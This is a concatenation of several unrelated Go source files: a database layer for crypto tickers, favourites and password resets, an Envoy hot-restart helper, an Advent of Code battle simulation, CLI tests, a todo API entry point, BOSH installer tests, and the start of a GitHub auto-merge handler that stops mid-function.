func (d *DBDriver) UpdateTicker(tickerData *TickerData) error {
	var test string
	var query string
	err := d.Conn.Get(&test, `SELECT id FROM products_tickers WHERE id=$1`, tickerData.ID)
	switch {
	case err == sql.ErrNoRows:
		query = `INSERT INTO products_tickers (id, price, size, time, bid, ask, volume) VALUES(:ID, :Price, :Size, :Time, :Bid, :Ask, :Volume)`
	case err != nil:
		return DbQueryError
	default:
		query = `UPDATE products_tickers SET price=:Price, size=:Size, time=:Time, bid=:Bid, ask=:Ask, volume=:Volume WHERE id=:ID`
	}
	_, err = d.Conn.NamedExec(query, map[string]interface{}{
		"ID":     tickerData.ID,
		"Price":  tickerData.Price,
		"Size":   tickerData.Size,
		"Time":   tickerData.Time,
		"Bid":    tickerData.Bid,
		"Ask":    tickerData.Ask,
		"Volume": tickerData.Volume,
	})
	if err != nil {
		return DbQueryError
	}
	return nil
}
// SelectedProduct fetches the ticker row for the given product id.
// Returns DbQueryError on any lookup failure, including a missing row:
// the original's separate sql.ErrNoRows check sat after the generic error
// return (unreachable) and returned the same error, so it has been removed.
func (d *DBDriver) SelectedProduct(id string) (*TickerData, error) {
	data := &TickerData{}
	err := d.Conn.Get(data, `SELECT id,price,size,time,bid,ask,volume FROM products_tickers WHERE id = $1`, id)
	if err != nil {
		return nil, DbQueryError
	}
	return data, nil
}
// AddFav inserts a row into users_favourites linking userId to productID,
// keyed by a freshly generated UUID. Returns AddFavProductError when either
// UUID generation or the insert fails.
func (d *DBDriver) AddFav(userId string, productID string) error {
	favId, err := uuid.NewV4()
	if err != nil {
		return AddFavProductError
	}
	params := map[string]interface{}{
		"FavID":     favId.String(),
		"UserID":    userId,
		"ProductID": productID,
	}
	if _, err = d.Conn.NamedExec(`INSERT INTO users_favourites (fav_id, user_id, ticker_id) VALUES (:FavID, :UserID, :ProductID)`, params); err != nil {
		return AddFavProductError
	}
	return nil
}
// RemoveFav "removes" a favourite by soft delete: it archives the matching
// users_favourites row (archived = true, stamped with the current time)
// rather than deleting it. Returns RemoveFavProductError on failure.
func (d *DBDriver) RemoveFav(userId string, productID string) error {
	query := ` UPDATE users_favourites
	SET archived = true, archived_at = current_timestamp
	WHERE user_id = :UserID
	AND ticker_id = :TickerID`
	_, err := d.Conn.NamedExec(query, map[string]interface{}{
		"UserID":   userId,
		"TickerID": productID,
	})
	if err != nil {
		return RemoveFavProductError
	}
	return nil
}
// CheckFav toggles the favourite state of productID for userID and returns
// the user's refreshed favourites list: a missing row is created (AddFav),
// an archived row is unarchived, and an active row is archived (RemoveFav).
// Fix over the original: the AddFav and UnarchivedProduct errors were
// silently discarded; they are now propagated.
func (d *DBDriver) CheckFav(userID string, productID string) (*[]FavProducts, error) {
	var favID string
	var isArchived bool
	err := d.Conn.Get(&favID, `SELECT fav_id FROM users_favourites WHERE user_id=$1 AND ticker_id=$2`, userID, productID)
	if err != nil {
		if err == sql.ErrNoRows {
			if err := d.AddFav(userID, productID); err != nil {
				return nil, err
			}
		} else {
			return nil, BadRequestError
		}
	}
	// NOTE(review): a row just created by AddFav presumably has
	// archived=false, so it falls into the RemoveFav branch below and is
	// archived immediately — this matches the original flow, but confirm it
	// is the intended toggle behavior.
	err = d.Conn.Get(&isArchived, `SELECT archived FROM users_favourites WHERE user_id=$1 AND ticker_id=$2`, userID, productID)
	if err != nil {
		return nil, BadRequestError
	} else if isArchived {
		if err := d.UnarchivedProduct(userID, productID); err != nil {
			return nil, err
		}
	} else {
		err = d.RemoveFav(userID, productID)
		if err != nil {
			return nil, RemoveFavProductError
		}
	}
	data, err := d.GetFavProducts(userID)
	if err != nil {
		fmt.Println(err)
		return nil, DbQueryError
	}
	return data, nil
}
// UnarchivedProduct clears the archived flag on the users_favourites row
// for the given user/product pair. NOTE(review): it also resets archived_at
// to the current timestamp even though the row is being UN-archived —
// confirm whether that column is meant to record the last state change.
func (d *DBDriver) UnarchivedProduct(userID string, productID string) error {
	query := ` UPDATE users_favourites
	SET archived = false, archived_at = current_timestamp
	WHERE user_id = :UserID
	AND ticker_id = :TickerID`
	_, err := d.Conn.NamedExec(query, map[string]interface{}{
		"UserID":   userID,
		"TickerID": productID,
	})
	if err != nil {
		return DbQueryError
	}
	return nil
}
// GetFavProducts returns the ticker data for every non-archived favourite
// of the given user, joining users_favourites with products_tickers.
// NOTE(review): sqlx Select does not return sql.ErrNoRows for an empty
// result set, so the EmptyFavProductList branch is likely never taken —
// confirm whether callers rely on it.
func (d *DBDriver) GetFavProducts(id string) (*[]FavProducts, error) {
	data := &[]FavProducts{}
	err := d.Conn.Select(data, `
	SELECT p.id, p.price, p.size, p.time, p.bid, p.ask, p.volume
	FROM users_favourites uf, products_tickers p
	WHERE uf.ticker_id = p.id
	AND uf.user_id=$1
	AND uf.archived = false`, id)
	if err == sql.ErrNoRows {
		return nil, EmptyFavProductList
	}
	if err != nil {
		return nil, DbQueryError
	}
	return data, nil
}
// VerifyUserAcc marks as verified whichever user owns the supplied
// verification token; returns UserVerificationError when the update fails.
func (d *DBDriver) VerifyUserAcc(veriToken string) error {
	params := map[string]interface{}{"VerificationToken": veriToken}
	if _, err := d.Conn.NamedExec(`UPDATE users SET verification = true WHERE verification_token = :VerificationToken`, params); err != nil {
		return UserVerificationError
	}
	return nil
}
// ResetPassword changes a logged-in user's password: it verifies currentPw
// against the stored bcrypt hash, then stores a fresh hash of newPw.
// Returns DbQueryError on lookup failure, PasswordMatchingIssue when the
// current password is wrong, and ResetPasswordError on hash or update
// failure.
func (d *DBDriver) ResetPassword(userID string, currentPw string, newPw string) error {
	var pw []byte
	err := d.Conn.Get(&pw, `SELECT password_hash FROM users WHERE id=$1`, userID)
	if err != nil {
		fmt.Println(err)
		return DbQueryError
	}
	// Require the caller to prove knowledge of the current password.
	err = bcrypt.CompareHashAndPassword(pw, []byte(currentPw))
	if err != nil {
		fmt.Println(err)
		return PasswordMatchingIssue
	}
	newPwHash, err := bcrypt.GenerateFromPassword([]byte(newPw), bcrypt.DefaultCost)
	if err != nil {
		fmt.Println("this error: ", err)
		return ResetPasswordError
	}
	query := `UPDATE users SET password_hash = :NewPassword WHERE id = :UserID`
	_, err = d.Conn.NamedExec(query, map[string]interface{}{
		"NewPassword": newPwHash,
		"UserID":      userID,
	})
	if err != nil {
		return ResetPasswordError
	}
	return nil
}
// GetResetPassToken returns the stored reset-password token for the account
// registered under email. RequestResetPassTokenError signals an unknown
// email; DbQueryError covers any other lookup failure.
func (d *DBDriver) GetResetPassToken(email string) (string, error) {
	var token string
	switch err := d.Conn.Get(&token, `SELECT reset_pass_token FROM users WHERE email=$1`, email); {
	case err == sql.ErrNoRows:
		return "", RequestResetPassTokenError
	case err != nil:
		return "", DbQueryError
	}
	return token, nil
}
// UpdatePassWToken completes a token-based password reset: it resolves the
// user owning resetPassToken, stores a fresh bcrypt hash of the new
// password, and rotates the reset token so it cannot be replayed.
// (The old comment called this UpdatePassToken; the actual exported name is
// UpdatePassWToken.)
func (d *DBDriver) UpdatePassWToken(resetPassToken string, password string) error {
	var userID string
	// gets user_id
	err := d.Conn.Get(&userID, `SELECT id FROM users WHERE reset_pass_token=$1`, resetPassToken)
	if err != nil {
		if err == sql.ErrNoRows {
			return DbQueryError
		}
		return BadRequestError
	}
	// hashes new password
	newPwHash, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
	if err != nil {
		return ResetPasswordError
	}
	// generates new reset password token (single-use rotation)
	newToken, err := uuid.NewV4()
	if err != nil {
		return ResetPasswordError
	}
	new_token := newToken.String()
	// updates new password hash and new reset password token
	query := `UPDATE users SET password_hash = :NewPassword, reset_pass_token = :NewToken WHERE id = :UserID`
	_, err = d.Conn.NamedExec(query, map[string]interface{}{
		"NewPassword": newPwHash,
		"NewToken":    new_token,
		"UserID":      userID,
	})
	if err != nil {
		return ResetPasswordError
	}
	return nil
}
|
//go:build linux
// +build linux
package envoy
import (
	"context"
	"os"
	"strconv"
	"strings"
	"sync"
	"syscall"
	"time"

	"go.opencensus.io/stats/view"

	"github.com/pomerium/pomerium/internal/log"
	"github.com/pomerium/pomerium/internal/telemetry/metrics"
)
// baseIDPath is where envoy persists its shared-memory base ID (written by
// envoy via --base-id-path) so subsequent hot-reloads can reuse it.
const baseIDPath = "/tmp/pomerium-envoy-base-id"
// restartEpoch tracks the --restart-epoch counter passed to successive
// envoy invocations during hot restarts; guarded by its embedded mutex.
var restartEpoch struct {
	sync.Mutex
	value int
}
// sysProcAttr runs envoy in its own process group and asks the kernel to
// send it SIGTERM if the parent (pomerium) dies.
var sysProcAttr = &syscall.SysProcAttr{
	Setpgid:   true,
	Pdeathsig: syscall.SIGTERM,
}
// runProcessCollector samples process metrics for the running envoy every
// 10 seconds and exports them through OpenCensus views until ctx is done.
func (srv *Server) runProcessCollector(ctx context.Context) {
	pc := metrics.NewProcessCollector("envoy")
	if err := view.Register(pc.Views()...); err != nil {
		log.Error(ctx).Err(err).Msg("failed to register envoy process metric views")
	}
	defer view.Unregister(pc.Views()...)
	const collectInterval = time.Second * 10
	ticker := time.NewTicker(collectInterval)
	defer ticker.Stop()
	for {
		select {
		case <-ctx.Done():
			return
		case <-ticker.C:
		}
		// Snapshot the pid under the lock; the process may be replaced
		// concurrently by a hot-reload.
		var pid int
		srv.mu.Lock()
		if srv.cmd != nil && srv.cmd.Process != nil {
			pid = srv.cmd.Process.Pid
		}
		srv.mu.Unlock()
		if pid > 0 {
			err := pc.Measure(ctx, pid)
			if err != nil {
				log.Error(ctx).Err(err).Msg("failed to measure envoy process metrics")
			}
		}
	}
}
// prepareRunEnvoyCommand releases any currently tracked envoy process (so a
// hot-reload can take over) and assembles the argv for the next envoy run,
// appending the base-id/restart-epoch flags that drive envoy's hot restart.
func (srv *Server) prepareRunEnvoyCommand(ctx context.Context, sharedArgs []string) (exePath string, args []string) {
	// release the previous process so we can hot-reload
	if srv.cmd != nil && srv.cmd.Process != nil {
		log.Info(ctx).Msg("envoy: releasing envoy process for hot-reload")
		err := srv.cmd.Process.Release()
		if err != nil {
			log.Warn(ctx).Err(err).Str("service", "envoy").Msg("envoy: failed to release envoy process for hot-reload")
		}
	}
	args = make([]string, len(sharedArgs))
	copy(args, sharedArgs)
	restartEpoch.Lock()
	if baseID, ok := readBaseID(); ok {
		// A previous run persisted its base ID: reuse it and bump the
		// restart epoch so envoy performs a draining hot restart.
		args = append(args,
			"--base-id", strconv.Itoa(baseID),
			"--restart-epoch", strconv.Itoa(restartEpoch.value),
			"--drain-time-s", "60",
			"--parent-shutdown-time-s", "120",
			"--drain-strategy", "immediate",
		)
		restartEpoch.value++
	} else {
		// First run: let envoy pick a dynamic base ID and persist it for
		// later reloads.
		args = append(args,
			"--use-dynamic-base-id",
			"--base-id-path", baseIDPath,
		)
		restartEpoch.value = 1
	}
	restartEpoch.Unlock()
	return srv.envoyPath, args
}
// readBaseID loads the envoy shared-memory base ID persisted at baseIDPath
// by a previous run. The second return value is false when the file is
// missing or does not contain an integer.
// Fix over the original: the file contents are trimmed of surrounding
// whitespace first, so a trailing newline (e.g. from a hand-edited or
// tool-written file) no longer makes strconv.Atoi fail.
func readBaseID() (int, bool) {
	bs, err := os.ReadFile(baseIDPath)
	if err != nil {
		return 0, false
	}
	baseID, err := strconv.Atoi(strings.TrimSpace(string(bs)))
	if err != nil {
		return 0, false
	}
	return baseID, true
}
|
package main
import (
"fmt"
"strings"
)
// loaddata2 parses the battlefield map: every rune is stored in the grid by
// coordinate, each 'G' spawns a goblin and each 'E' an elf (elves get the
// caller-supplied attack power for the part-2 search). Returns the units,
// the grid, and the maximum x/y coordinates seen.
func loaddata2(input string, elfpower int) ([]unit, grid, int, int) {
	grid := grid{}
	units := []unit{}
	x := 0
	y := 0
	maxx := 0
	maxy := 0
	for _, line := range strings.Split(input, "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		for _, r := range line {
			grid[coord{x, y}] = r
			if r == 'G' {
				units = append(units, unit{goblin, default_hp, default_attackpower, coord{x, y}})
			} else if r == 'E' {
				// Elves use the experimental attack power under test.
				units = append(units, unit{elf, default_hp, elfpower, coord{x, y}})
			}
			maxx = x
			x++
		}
		maxy = y
		y++
		x = 0
	}
	return units, grid, maxx, maxy
}
// round2 plays one full combat round (AoC 2018 day 15, part 2 rules): each
// living unit, in reading order, moves one step toward the nearest
// reachable enemy-adjacent square and then attacks the weakest adjacent
// enemy. Returns (partialRound, elfDied): partialRound is true when the war
// ended mid-round (that round does not count toward the score), and elfDied
// is true the moment any elf is killed, which aborts the part-2 attempt.
func round2(units []unit, g grid, x int, y int) (bool, bool) {
	//sort units by reading order (y, then x)
	sortByReadingOrder(units)
	//for each unit
	for i := range units {
		u := units[i]
		if u.hitpoints <= 0 {
			continue
		}
		if warover(units) {
			// A unit was about to act with no enemies left: partial round.
			return true, false
		}
		//identify all targets (enemies)
		enemies := []unit{}
		for _, pe := range units {
			//ignore dead enemies =)
			if pe.side != u.side && pe.hitpoints > 0 {
				enemies = append(enemies, pe)
			}
		}
		//identify if unit is adjacent(u/d/l/r) of enemy
		adjacentenemies := []unit{}
		for _, e := range enemies {
			if adjacent(u, e) {
				adjacentenemies = append(adjacentenemies, e)
			}
		}
		if len(adjacentenemies) == 0 {
			// for each enemy unit, identify adjacent(u/d/l/r) empty (.) squares
			targetcoords := []coord{}
			for _, ae := range enemies {
				targetcoords = append(targetcoords, clearNeighbours(ae.xy, g)...)
			}
			// if no empty squares beside enemies, end turn
			if len(targetcoords) == 0 {
				continue
			}
			// for each empty square
			// determine path length
			closest, distance := findClosest(g, u.xy, targetcoords)
			// if all squares are unreachable, end turn
			if len(closest) == 0 {
				continue
			}
			// Tie-break the destination by reading order, then take the
			// first neighbouring step that stays on a shortest path.
			sortCoordsByReadingOrder(closest)
			chosen := []coord{closest[0]}
			for _, c := range clearNeighbours(u.xy, g) {
				_, d := findClosest(g, c, chosen)
				if d == distance-1 {
					g[u.xy] = '.'
					units[i].xy = c
					if u.side == elf {
						g[c] = 'E'
					} else {
						g[c] = 'G'
					}
					break
				}
			}
			//update adjacent enemies after move.
			for _, e := range enemies {
				if adjacent(units[i], e) {
					adjacentenemies = append(adjacentenemies, e)
				}
			}
		}
		//after move phase, attack
		if len(adjacentenemies) == 0 {
			//if no adjacent enemies, end turn.
			continue
		}
		//select weakest enemy
		chosen := selectWeakestEnemy(adjacentenemies)
		for ce := range units {
			//ideally we'd do chosen.hitpoints here, but
			//chosen appears to be a copy, not the item in the array
			//so go find the matching entry in the array.
			//it MUST have the same coords, but ignore already dead
			//units because they may have same coords as live ones!
			if units[ce].xy == chosen.xy && units[ce].hitpoints > 0 {
				units[ce].hitpoints -= u.attackpower
				if units[ce].hitpoints <= 0 {
					g[chosen.xy] = '.'
					if units[ce].side == elf {
						// An elf died: this attack-power attempt failed.
						return false, true
					}
				}
				break
			}
		}
	}
	return false, false
}
// part2 runs the battle to completion with the units' current attack
// powers. It prints the outcome score (completed rounds * surviving hit
// points) and returns true on success, or false as soon as an elf dies.
func part2(units []unit, g grid, x int, y int) bool {
	var currentround int
	for currentround = 1; !warover(units); currentround++ {
		partialround, elfdied := round2(units, g, x, y)
		if elfdied {
			return false
		}
		if partialround {
			//this round didn't count
			currentround--
		}
	}
	//round will still be ++ due to for loop, so -1 to get last value
	fmt.Println("last full round ", currentround-1, (currentround-1)*sumhitpoints(units))
	return true
}
// main2 searches for the smallest elf attack power (starting at 4) at which
// the elves win the battle without a single casualty, reloading a fresh
// battlefield for each attempt.
func main2() {
	fmt.Println(">Part 2")
	for elfpower := 4; elfpower < 200; elfpower++ {
		fmt.Println("Testing elf powah ", elfpower)
		units, g, x, y := loaddata2(data(), elfpower)
		if part2(units, g, x, y) {
			fmt.Println("Elf Power was ", elfpower)
			break
		}
	}
}
|
package cmd
import (
"os"
"strings"
"testing"
"github.com/stretchr/testify/assert"
"github.com/instructure-bridge/muss/config"
"github.com/instructure-bridge/muss/testutil"
)
// testRootCmd runs the root command with the given args against an empty
// config, capturing the exit code and everything written to stdout/stderr.
func testRootCmd(args ...string) (int, string, string) {
	var stdout, stderr strings.Builder
	cfg, _ := config.NewConfigFromMap(nil)
	rootCmd := NewRootCommand(cfg)
	rootCmd.SetOut(&stdout)
	rootCmd.SetErr(&stderr)
	exitCode := ExecuteRoot(rootCmd, args)
	return exitCode, stdout.String(), stderr.String()
}
// getLines returns at most the first want lines of s, each line keeping its
// trailing newline (split via strings.SplitAfter).
func getLines(s string, want int) []string {
	lines := strings.SplitAfter(s, "\n")
	if len(lines) <= want {
		return lines
	}
	return lines[:want]
}
// TestRootCommand exercises the root CLI's error handling (bad flags,
// unknown subcommands), delegated-command exit-code passthrough, and the
// end-to-end Execute() path that writes docker-compose.yml from muss.yaml.
func TestRootCommand(t *testing.T) {
	withTestPath(t, func(t *testing.T) {
		t.Run("bad flag", func(t *testing.T) {
			exitCode, stdout, stderr := testRootCmd("--foo")
			assert.Equal(t, 1, exitCode, "exit 1")
			assert.Equal(t, "", stdout)
			assert.Equal(t,
				[]string{"Error: unknown flag: --foo\n", "\n", "Usage:\n", "  muss [command]\n"},
				getLines(stderr, 4),
			)
		})
		t.Run("bad subcmd", func(t *testing.T) {
			exitCode, stdout, stderr := testRootCmd("foo")
			assert.Equal(t, 1, exitCode, "exit 1")
			assert.Equal(t, "", stdout)
			assert.Equal(t,
				[]string{"Error: unknown command \"foo\" for \"muss\"\n", "\n", "Usage:\n", "  muss [command]\n"},
				getLines(stderr, 4),
			)
		})
		t.Run("bad subcmd flag", func(t *testing.T) {
			exitCode, stdout, stderr := testRootCmd("wrap", "--foo")
			assert.Equal(t, 1, exitCode, "exit 1")
			assert.Equal(t, "", stdout)
			assert.Equal(t,
				[]string{"Error: unknown flag: --foo\n", "\n", "Usage:\n", "  muss wrap [flags]\n"},
				getLines(stderr, 4),
			)
		})
		t.Run("non-zero delegated command exit", func(t *testing.T) {
			// The fake docker-compose honors MUSS_TEST_DC_ERROR as its exit code.
			os.Setenv("MUSS_TEST_DC_ERROR", "2")
			defer os.Unsetenv("MUSS_TEST_DC_ERROR")
			exitCode, stdout, stderr := testRootCmd("pull")
			assert.Equal(t, 2, exitCode, "exit 2")
			assert.Equal(t, "", stdout)
			assert.Equal(t, "", stderr)
		})
		t.Run("success", func(t *testing.T) {
			exitCode, stdout, stderr := testRootCmd("pull")
			assert.Equal(t, 0, exitCode, "exit 0")
			assert.Equal(t, "docker-compose\npull\n", stdout)
			assert.Equal(t, "std err\n", stderr)
		})
	})
	t.Run("Execute()", func(t *testing.T) {
		testutil.WithTempDir(t, func(tmpdir string) {
			yaml := `---
module_definitions:
  - name: foo
    configs:
      sole:
        version: "1.5"
`
			testutil.WriteFile(t, "muss.yaml", yaml)
			dest := "docker-compose.yml"
			testutil.NoFileExists(t, dest)
			// Execute regenerates the compose file before delegating to "true"/"false".
			assert.Equal(t, 0, Execute([]string{"wrap", "true"}), "exit 0")
			assert.Contains(t, testutil.ReadFile(t, dest), `version: "1.5"`, "config written")
			os.Remove(dest)
			testutil.NoFileExists(t, dest)
			assert.Equal(t, 1, Execute([]string{"wrap", "false"}), "exit 1")
			assert.Contains(t, testutil.ReadFile(t, dest), `version: "1.5"`, "config written again")
		})
	})
}
|
package main
import (
"final-project/config/postgres"
"final-project/http/routes"
todos "final-project/repository/postgres"
"fmt"
"log"
"os"
"os/signal"
"syscall"
"github.com/subosito/gotenv"
)
// init configures the standard logger to include file:line prefixes and
// loads environment variables from a .env file; a missing file is only
// logged, not fatal.
func init() {
	log.SetFlags(log.LstdFlags | log.Lshortfile)

	err := gotenv.Load()
	if err != nil {
		log.Println(err)
	}
}
func main() {
db := postgres.Connect()
repo := todos.NewTodoRepo(db)
errs := make(chan error)
go func() {
sigChan := make(chan os.Signal, 1)
signal.Notify(sigChan, syscall.SIGTERM, syscall.SIGINT)
sig := <-sigChan
log.Printf("Signal notified %v", sig)
errs <- fmt.Errorf("%v", sig)
}()
go func() {
router := routes.NewRouter(repo)
if err := router.Run(":" + os.Getenv("PORT")); err != nil {
errs <- err
}
}()
log.Fatal(<-errs)
}
|
package install_test
import (
"errors"
"os"
"path/filepath"
"time"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
bmeventlog "github.com/cloudfoundry/bosh-micro-cli/eventlogging"
bmrel "github.com/cloudfoundry/bosh-micro-cli/release"
bmtempcomp "github.com/cloudfoundry/bosh-micro-cli/templatescompiler"
fakesys "github.com/cloudfoundry/bosh-agent/system/fakes"
faketime "github.com/cloudfoundry/bosh-agent/time/fakes"
fakebmlog "github.com/cloudfoundry/bosh-micro-cli/eventlogging/fakes"
fakebminstall "github.com/cloudfoundry/bosh-micro-cli/install/fakes"
fakebmtemcomp "github.com/cloudfoundry/bosh-micro-cli/templatescompiler/fakes"
. "github.com/cloudfoundry/bosh-micro-cli/install"
)
// Ginkgo spec for JobInstaller: installing a release job means creating the
// job/package directories, extracting the rendered-template blob, making the
// job's bin/ files executable, installing its packages, and logging start/
// finish/fail events with timestamps from the fake time service.
var _ = Describe("JobInstaller", func() {
	var (
		fs               *fakesys.FakeFileSystem
		jobInstaller     JobInstaller
		job              bmrel.Job
		packageInstaller *fakebminstall.FakePackageInstaller
		blobExtractor    *fakebminstall.FakeBlobExtractor
		templateRepo     *fakebmtemcomp.FakeTemplatesRepo
		jobsPath         string
		packagesPath     string
		eventLogger      *fakebmlog.FakeEventLogger
		timeService      *faketime.FakeService
	)
	Context("Installing the job", func() {
		// Fresh fakes per example; the template repo and blob extractor are
		// pre-stubbed for the "cpi" job so the happy path succeeds.
		BeforeEach(func() {
			fs = fakesys.NewFakeFileSystem()
			packageInstaller = fakebminstall.NewFakePackageInstaller()
			blobExtractor = fakebminstall.NewFakeBlobExtractor()
			templateRepo = fakebmtemcomp.NewFakeTemplatesRepo()
			jobsPath = "/fake/jobs"
			packagesPath = "/fake/packages"
			eventLogger = fakebmlog.NewFakeEventLogger()
			timeService = &faketime.FakeService{}
			jobInstaller = NewJobInstaller(fs, packageInstaller, blobExtractor, templateRepo, jobsPath, packagesPath, eventLogger, timeService)
			job = bmrel.Job{
				Name: "cpi",
			}
			templateRepo.SetFindBehavior(job, bmtempcomp.TemplateRecord{BlobID: "fake-blob-id", BlobSHA1: "fake-sha1"}, true, nil)
			blobExtractor.SetExtractBehavior("fake-blob-id", "fake-sha1", "/fake/jobs/cpi", nil)
		})
		It("makes the files in the job's bin directory executable", func() {
			cpiExecutablePath := "/fake/jobs/cpi/bin/cpi"
			// The installer globs bin/* and chmods each match to 0755.
			fs.SetGlob("/fake/jobs/cpi/bin/*", []string{cpiExecutablePath})
			fs.WriteFileString(cpiExecutablePath, "contents")
			_, err := jobInstaller.Install(job)
			Expect(err).ToNot(HaveOccurred())
			Expect(fs.GetFileTestStat(cpiExecutablePath).FileMode).To(Equal(os.FileMode(0755)))
		})
		It("returns a record of the installed job", func() {
			installedJob, err := jobInstaller.Install(job)
			Expect(err).ToNot(HaveOccurred())
			Expect(installedJob).To(Equal(
				InstalledJob{
					Name: "cpi",
					Path: "/fake/jobs/cpi",
				},
			))
		})
		It("creates basic job layout", func() {
			_, err := jobInstaller.Install(job)
			Expect(err).ToNot(HaveOccurred())
			Expect(fs.FileExists(filepath.Join(jobsPath, job.Name))).To(BeTrue())
			Expect(fs.FileExists(packagesPath)).To(BeTrue())
		})
		It("finds the rendered templates for the job from the repo", func() {
			_, err := jobInstaller.Install(job)
			Expect(err).ToNot(HaveOccurred())
			Expect(templateRepo.FindInputs).To(ContainElement(fakebmtemcomp.FindInput{Job: job}))
		})
		It("tells the blobExtractor to extract the templates into the installed job dir", func() {
			_, err := jobInstaller.Install(job)
			Expect(err).ToNot(HaveOccurred())
			Expect(blobExtractor.ExtractInputs).To(ContainElement(fakebminstall.ExtractInput{
				BlobID:    "fake-blob-id",
				BlobSHA1:  "fake-sha1",
				TargetDir: filepath.Join(jobsPath, job.Name),
			}))
		})
		It("logs events to the event logger", func() {
			// Two stubbed clock reads: one at install start, one at finish.
			installStart := time.Now()
			installFinish := installStart.Add(1 * time.Second)
			timeService.NowTimes = []time.Time{installStart, installFinish}
			_, err := jobInstaller.Install(job)
			Expect(err).ToNot(HaveOccurred())
			expectedStartEvent := bmeventlog.Event{
				Time:  installStart,
				Stage: "installing CPI jobs",
				Total: 1,
				Task:  "cpi",
				Index: 1,
				State: bmeventlog.Started,
			}
			expectedFinishEvent := bmeventlog.Event{
				Time:  installFinish,
				Stage: "installing CPI jobs",
				Total: 1,
				Task:  "cpi",
				Index: 1,
				State: bmeventlog.Finished,
			}
			Expect(eventLogger.LoggedEvents).To(ContainElement(expectedStartEvent))
			Expect(eventLogger.LoggedEvents).To(ContainElement(expectedFinishEvent))
		})
		It("logs failure event", func() {
			// Force the very first filesystem operation (MkdirAll) to fail so
			// the installer emits a Failed event with the wrapped error.
			fs.MkdirAllError = errors.New("fake-mkdir-error")
			installStart := time.Now()
			installFail := installStart.Add(1 * time.Second)
			timeService.NowTimes = []time.Time{installStart, installFail}
			_, err := jobInstaller.Install(job)
			Expect(err).To(HaveOccurred())
			expectedStartEvent := bmeventlog.Event{
				Time:  installStart,
				Stage: "installing CPI jobs",
				Total: 1,
				Task:  "cpi",
				Index: 1,
				State: bmeventlog.Started,
			}
			expectedFailEvent := bmeventlog.Event{
				Time:    installFail,
				Stage:   "installing CPI jobs",
				Total:   1,
				Task:    "cpi",
				Index:   1,
				State:   bmeventlog.Failed,
				Message: "Creating jobs directory `/fake/jobs/cpi': fake-mkdir-error",
			}
			Expect(eventLogger.LoggedEvents).To(ContainElement(expectedStartEvent))
			Expect(eventLogger.LoggedEvents).To(ContainElement(expectedFailEvent))
		})
		Context("when the job has packages", func() {
			var pkg1 bmrel.Package
			BeforeEach(func() {
				pkg1 = bmrel.Package{Name: "fake-pkg-name"}
				job.Packages = []*bmrel.Package{&pkg1}
				packageInstaller.SetInstallBehavior(&pkg1, packagesPath, nil)
				templateRepo.SetFindBehavior(job, bmtempcomp.TemplateRecord{BlobID: "fake-blob-id", BlobSHA1: "fake-sha1"}, true, nil)
			})
			It("install packages correctly", func() {
				_, err := jobInstaller.Install(job)
				Expect(err).ToNot(HaveOccurred())
				Expect(packageInstaller.InstallInputs).To(ContainElement(
					fakebminstall.InstallInput{Package: &pkg1, Target: packagesPath},
				))
			})
			It("return err when package installation fails", func() {
				packageInstaller.SetInstallBehavior(
					&pkg1,
					packagesPath,
					errors.New("Installation failed, yo"),
				)
				_, err := jobInstaller.Install(job)
				Expect(err).To(HaveOccurred())
				Expect(err.Error()).To(ContainSubstring("Installation failed"))
			})
		})
	})
})
|
package epic
import (
"fmt"
"log"
"github.com/google/go-github/github"
"github.com/karen-irc/popuko/operation"
"github.com/karen-irc/popuko/queue"
"github.com/karen-irc/popuko/setting"
)
// CheckAutoBranch handles a GitHub status event for the auto-merge branch.
// If the event belongs to the commit currently being tested, it finalizes
// the active queue item (merging the PR on success, commenting/labelling on
// failure), removes it from the queue, and kicks off the next queued item.
// Pending events and repositories without auto-merge enabled are ignored.
func CheckAutoBranch(client *github.Client, autoMergeRepo *queue.AutoMergeQRepo, ev *github.StatusEvent) {
	log.Println("info: Start: checkAutoBranch")
	defer log.Println("info: End: checkAutoBranch")
	// Only terminal states (success/failure/error) are actionable.
	if *ev.State == "pending" {
		log.Println("info: Not handle pending status event")
		return
	}
	log.Printf("info: Start to handle status event: %v\n", *ev.State)
	repoOwner := *ev.Repo.Owner.Login
	repoName := *ev.Repo.Name
	log.Printf("info: Target repository is %v/%v\n", repoOwner, repoName)
	repoInfo := GetRepositoryInfo(client.Repositories, repoOwner, repoName)
	if repoInfo == nil {
		log.Println("debug: cannot get repositoryInfo")
		return
	}
	log.Println("info: success to load the configure.")
	if !repoInfo.EnableAutoMerge {
		log.Println("info: this repository does not enable merging into master automatically.")
		return
	}
	log.Println("info: Start to handle auto merging the branch.")
	qHandle := autoMergeRepo.Get(repoOwner, repoName)
	if qHandle == nil {
		log.Println("error: cannot get the queue handle")
		return
	}
	// The queue is locked for the whole finalize-and-advance sequence.
	qHandle.Lock()
	defer qHandle.Unlock()
	q := qHandle.Load()
	if !q.HasActive() {
		log.Println("info: there is no testing item")
		return
	}
	active := q.GetActive()
	if active == nil {
		log.Println("error: `active` should not be null")
		return
	}
	log.Println("info: got the active item.")
	// NOTE(review): "tesing" below is a typo in a runtime log string; left
	// unchanged here because doc-only edits must not touch runtime strings.
	if !isRelatedToAutoBranch(active, ev, repoInfo.AutoBranchName) {
		log.Printf("info: The event's tip sha does not equal to the one which is tesing actively in %v/%v\n", repoOwner, repoName)
		return
	}
	log.Println("info: the status event is related to auto branch.")
	// Finalize the active item (the boolean result is intentionally ignored:
	// the item is removed from the queue either way), then start the next one.
	mergeSucceedItem(client, repoOwner, repoName, repoInfo, q, ev)
	q.RemoveActive()
	q.Save()
	tryNextItem(client, repoOwner, repoName, q, repoInfo.AutoBranchName)
	log.Println("info: complete to start the next trying")
}
// isRelatedToAutoBranch reports whether the status event targets the auto
// branch and carries the commit hash of the actively tested queue item.
func isRelatedToAutoBranch(active *queue.AutoMergeQueueItem, ev *github.StatusEvent, autoBranch string) bool {
	if !operation.IsIncludeAutoBranch(ev.Branches, autoBranch) {
		log.Printf("warn: this status event (%v) does not include the auto branch\n", *ev.ID)
		return false
	}

	if !checkCommitHashOnTrying(active, ev) {
		return false
	}

	log.Println("info: the tip of auto branch is same as `active.SHA`")
	return true
}
// checkCommitHashOnTrying reports whether the commit hash carried by the
// status event matches the auto-branch tip pinned on the active queue item.
// A nil pinned hash can never match.
func checkCommitHashOnTrying(active *queue.AutoMergeQueueItem, ev *github.StatusEvent) bool {
	autoTipSha := active.AutoBranchHead
	if autoTipSha == nil {
		return false
	}
